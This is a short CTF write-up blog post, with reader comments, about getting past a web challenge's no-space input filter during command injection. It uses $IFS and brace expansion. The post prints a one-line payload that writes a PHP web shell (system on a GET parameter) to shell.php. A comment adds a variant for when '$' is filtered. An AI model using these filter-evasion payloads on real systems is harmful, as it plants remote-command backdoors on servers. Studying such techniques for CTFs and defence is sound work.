Home » CTF

Executing bash commands without space

25 July 2015 4 Comments

Hello, world.

So I was in this CTF competition and my teammate (@aboul3la) found a command injection vulnerability in one of web application challenges.

If you input `>file.txt` the server creates a file called file.txt.

We wanted to write a PHP shell to the server (echo “<?PHP CODE>” > file.php)
But the thing is, the challenge had a filter that won’t allow you to have a space in the input (Error: Not valid URL)

So we tried around and my first thought was to use some decoding mechanism to decrypt “space” from it’s hex equivalent or something, but we couldn’t do it without a space after the “echo”
Then i thought i should search and see if the space (or tab) is defined in Linux itself.
And i found it: $IFS.

The solution was:

echo$IFS”<?=system(\$_GET[x]);?>”>shell.php

If you wanted to wget something:

wget$IFS”https://google.com/robots.txt”

Update (25/8/2016):
Abk Khan commented below there is a second solution to this.

{echo,’~ AnonGuy’}>test.php

I didn’t know brace expansions could be used with commands as well.

Thanks for the addition!

4 Comments »

  • H@c| said:

    I was wondering if there is any other way of printing space in the command without using $IFS as $ character is also been sanitized from the input.

  • 0xAli (author) said:

    Tough question, but does it allow only alpha-numeric or just the $ and space?

  • Abk Khan said:

    You can use brace expansions if $ is getting filtered. 🙂
    {echo,’~ AnonGuy’}>test.php

  • 0xAli (author) said:

    This is great, thanks for sharing! I will include it on the article if you don’t mind.

Your opinion matters!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.